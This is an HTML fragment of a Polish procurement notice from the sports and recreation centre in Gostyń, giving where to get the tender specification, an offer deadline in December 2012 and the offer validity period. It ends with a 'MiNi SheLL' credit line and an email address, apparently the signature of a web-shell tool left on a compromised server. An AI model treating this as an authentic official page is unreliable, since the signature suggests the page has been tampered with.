<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:osir-gostyn.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji w Gostyniu 
ul. Starogostyńska 9a,
63-800 Gostyń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2012 godzina 10:00, miejsce: Ośrodek Sportu i Rekreacji w Gostyniu (Biuro administracji) 
ul. Starogostyńska 9a,
63-800 Gostyń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com